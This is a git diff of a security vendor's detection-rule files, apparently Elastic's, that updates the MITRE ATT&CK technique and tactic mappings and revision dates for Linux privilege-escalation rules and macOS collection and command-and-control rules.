creation_date = "2022/01/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,31 +100,46 @@ file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [[rule.threat.technique.subtechnique]] id = "T1574.007" name = "Path Interception by PATH Environment Variable" reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml index f7d626e37d7..3b93dd57a3c 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -168,3 +168,21 @@ framework = "MITRE ATT&CK" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml index 6073256d5ec..04869b7baed 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -156,12 +156,22 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml index c214967001f..c2e9257195e 100644 --- a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml +++ b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -131,6 +131,16 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml index d916e1256e9..f7950400278 100644 --- a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml +++ b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,3 +117,29 @@ reference = "https://attack.mitre.org/techniques/T1078/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml b/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml index 84c02d17563..789d6a14b7c 100644 --- a/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml +++ b/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml index c90a6990fbb..c7384b9670d 100644 --- a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml +++ b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml index b137cf4d019..5d26914be44 100644 --- a/rules/linux/privilege_escalation_sudo_hijacking.toml +++ b/rules/linux/privilege_escalation_sudo_hijacking.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,6 +133,11 @@ id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -150,3 +155,16 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml b/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml index 5ea5e75e9e2..feb099acfe7 100644 --- a/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml +++ b/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,29 +103,56 @@ sequence by host.id, process.session_leader.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.008" +name = "Ptrace System Calls" +reference = "https://attack.mitre.org/techniques/T1055/008/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml index a679ec48580..a15937e4c28 100644 --- a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml +++ b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml index 0035cfea05d..c6754a242a6 100644 --- a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,14 +109,36 @@ In Linux, CAP_CHOWN and CAP_FOWNER are capabilities that allow processes to chan [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml index 923962a5d96..20c3a9c7a7c 100644 --- a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml +++ b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/22" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,14 +124,31 @@ In Linux environments, the `/etc/passwd` file is crucial for managing user accou [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml index a179911f656..2c32e927a08 100644 --- a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -141,3 +141,21 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_uid_change_post_compilation.toml b/rules/linux/privilege_escalation_uid_change_post_compilation.toml index 8a74ae8f836..34b21863ace 100644 --- a/rules/linux/privilege_escalation_uid_change_post_compilation.toml +++ b/rules/linux/privilege_escalation_uid_change_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml index 46af7128890..31c8199b6ec 100644 --- a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml +++ b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,6 +115,16 @@ and process.parent.name:("bash" or "dash" or "sh" or "tcsh" or "csh" or "zsh" or [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -142,7 +152,6 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml index 05c5c6f2abf..98ed00988c7 100644 --- a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml +++ b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,6 +125,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_writable_docker_socket.toml b/rules/linux/privilege_escalation_writable_docker_socket.toml index 7b9152ef549..a19944f3bd7 100644 --- a/rules/linux/privilege_escalation_writable_docker_socket.toml +++ b/rules/linux/privilege_escalation_writable_docker_socket.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/25" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,14 +107,26 @@ Docker sockets facilitate communication between the Docker client and daemon, ty [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1611" name = "Escape to Host" reference = "https://attack.mitre.org/techniques/T1611/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml index 298a32c90fc..040480b43bf 100644 --- a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml +++ b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,30 +75,40 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" - [[rule.threat.technique]] - name = "Data Staged" - id = "T1074" - reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique.subtechnique]] - name = "Local Data Staging" - id = "T1074.001" - reference = "https://attack.mitre.org/techniques/T1074/001/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" - - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml index 68fa16c9024..27155e6e4f8 100644 --- a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml +++ b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,30 +80,35 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" - [[rule.threat.technique]] - name = "Data Staged" - id = "T1074" - reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" - [[rule.threat.technique.subtechnique]] - name = "Local Data Staging" - id = "T1074.001" - reference = "https://attack.mitre.org/techniques/T1074/001/" +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique]] - name = "Archive Collected Data" - id = "T1560" - reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/macos/command_and_control_aws_s3_connection_via_script.toml b/rules/macos/command_and_control_aws_s3_connection_via_script.toml index 2128dd0828a..3b50a6efad2 100644 --- a/rules/macos/command_and_control_aws_s3_connection_via_script.toml +++ b/rules/macos/command_and_control_aws_s3_connection_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,30 +78,58 @@ FROM logs-endpoint.events.network-* [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Web Service" - id = "T1567" - reference = "https://attack.mitre.org/techniques/T1567/" +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" - [[rule.threat.technique.subtechnique]] - name = "Exfiltration to Cloud Storage" - id = "T1567.002" - reference = "https://attack.mitre.org/techniques/T1567/002/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_google_calendar_c2_via_script.toml b/rules/macos/command_and_control_google_calendar_c2_via_script.toml index 9d68b0d613a..38e50b72a18 100644 --- a/rules/macos/command_and_control_google_calendar_c2_via_script.toml +++ b/rules/macos/command_and_control_google_calendar_c2_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,40 +83,50 @@ sequence by process.entity_id with maxspan=20s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_network_connection_to_oast_domain.toml b/rules/macos/command_and_control_network_connection_to_oast_domain.toml index 0da1e9b9455..3b29be346b3 100644 --- a/rules/macos/command_and_control_network_connection_to_oast_domain.toml +++ b/rules/macos/command_and_control_network_connection_to_oast_domain.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -77,25 +77,56 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - 